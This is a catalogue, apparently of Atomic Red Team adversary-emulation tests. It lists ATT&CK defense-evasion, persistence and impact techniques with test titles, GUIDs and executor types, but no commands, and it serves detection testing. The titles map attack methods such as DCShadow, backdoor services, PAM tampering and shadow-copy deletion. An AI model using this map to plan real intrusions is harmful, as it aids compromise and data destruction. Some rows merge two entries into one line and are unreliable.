406 defense-evasion T1036.003 Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
407 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
408 defense-evasion T1036.003 Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
412 defense-evasion T1036.003 Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
413 defense-evasion T1036.003 Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
414 defense-evasion T1036.003 Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
415 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) DCShadow - Mimikatz 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell manual
416 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
417 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
418 defense-evasion T1564.006 T1014 Run Virtual Instance Rootkit 1 3 Register Portable Virtualbox Windows Signed Driver Rootkit Test c59f246a-34f8-4e4d-9276-c295ef9ba0dd 8e4e1985-9a19-4529-b4b8-b7a49ff87fae command_prompt
defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
419 defense-evasion T1218.011 Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be command_prompt
420 defense-evasion T1218.011 Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
421 defense-evasion T1218.011 Rundll32 3 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
422 defense-evasion T1218.011 Rundll32 4 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
423 defense-evasion T1218.011 Rundll32 5 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
424 defense-evasion T1218.011 Rundll32 6 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
defense-evasion T1218.011 Rundll32 7 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
defense-evasion T1218.011 Rundll32 8 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
defense-evasion T1218.011 Rundll32 9 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
defense-evasion T1218.011 Rundll32 10 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
defense-evasion T1218.011 Rundll32 11 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
defense-evasion T1218.011 Rundll32 12 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
defense-evasion T1134.005 SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
425 defense-evasion T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
defense-evasion T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
426 defense-evasion T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
427 defense-evasion T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
428 defense-evasion T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
defense-evasion T1548.001 Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
defense-evasion T1548.001 Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
429 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
430 defense-evasion T1218 Signed Binary Proxy Execution 2 SyncAppvPublishingServer - Execute arbitrary PowerShell code d590097e-d402-44e2-ad72-2c6aa1ce78b1 command_prompt
431 defense-evasion T1218 Signed Binary Proxy Execution 3 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
432 defense-evasion T1218 Signed Binary Proxy Execution 4 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
433 defense-evasion T1218 Signed Binary Proxy Execution 5 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
defense-evasion T1218 Signed Binary Proxy Execution 6 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
defense-evasion T1218 Signed Binary Proxy Execution 7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
defense-evasion T1218 Signed Binary Proxy Execution 8 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
defense-evasion T1218 Signed Binary Proxy Execution 9 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
defense-evasion T1218 Signed Binary Proxy Execution 10 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
434 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
435 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
436 defense-evasion T1027.002 Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
437 defense-evasion T1027.002 Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
438 defense-evasion T1027.002 Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
439 defense-evasion T1027.002 Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
440 defense-evasion T1036.006 Space after Filename 1 Space After Filename (Manual) Space After Filename 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
defense-evasion T1036.006 Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
441 defense-evasion T1548.003 Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
442 defense-evasion T1548.003 Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
443 defense-evasion T1548.003 Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
444 defense-evasion T1497.001 System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
445 defense-evasion T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
446 defense-evasion T1497.001 System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
defense-evasion T1497.001 System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
447 defense-evasion T1070.006 Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
448 defense-evasion T1070.006 Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
449 defense-evasion T1070.006 Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
457 defense-evasion T1222.001 Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
458 defense-evasion T1222.001 Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
459 defense-evasion T1222.001 Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
460 defense-evasion T1222.001 Windows File and Directory Permissions Modification 4 attrib - hide file Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style 32b979da-7b68-42c9-9a99-0e39900fc36c ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt powershell
defense-evasion T1222.001 Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
461 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
462 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
463 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
464 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
persistence T1098 Account Manipulation 4 Azure - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
persistence T1098 Account Manipulation 5 Azure - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
persistence T1098 Account Manipulation 8 AzureAD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
persistence T1137.006 Add-ins 1 Code Executed Via Excel Add-in File (Xll) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
persistence T1098.001 Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
persistence T1098.001 Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
persistence T1098.001 Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
persistence T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
persistence T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
persistence T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
persistence T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
persistence T1136.003 Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
persistence T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
persistence T1546.015 Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
persistence T1546.015 Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
persistence T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
persistence T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
persistence T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
persistence T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
persistence T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
persistence T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
persistence T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
persistence T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
persistence T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
persistence T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
persistence T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
persistence T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
persistence T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
persistence T1136.001 Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
persistence T1136.001 Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
persistence T1136.001 Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
persistence T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
persistence T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
persistence T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
persistence T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
persistence T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
persistence T1137.002 Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
persistence T1137.004 Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
persistence T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
persistence T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
persistence T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
persistence T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
persistence T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
persistence T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
persistence T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
persistence T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
persistence T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
persistence T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
persistence T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
persistence T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
persistence T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
persistence T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
persistence T1547.001 Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
persistence T1547.001 Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
persistence T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
persistence T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
persistence T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
persistence T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
persistence T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
persistence T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
persistence T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
persistence T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
persistence T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
persistence T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
persistence T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
persistence T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
persistence T1037.005 Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
persistence T1543.002 Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
persistence T1543.002 Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
persistence T1053.006 Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
persistence T1053.006 Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
persistence T1053.006 Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
persistence T1546.005 Trap 1 Trap a74b2e07-5952-4c03-8b56-56274b076b61 sh
persistence T1546.004 Unix Shell Configuration Modification 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
persistence T1546.004 Unix Shell Configuration Modification 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
persistence T1505.003 Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
persistence T1546.003 Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
persistence T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
persistence T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
persistence T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
persistence T1543.003 Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
persistence T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
persistence T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
persistence T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
465 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
466 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
467 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
468 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
469 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
470 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
471 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
472 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog Windows - Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
473 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
474 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
475 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
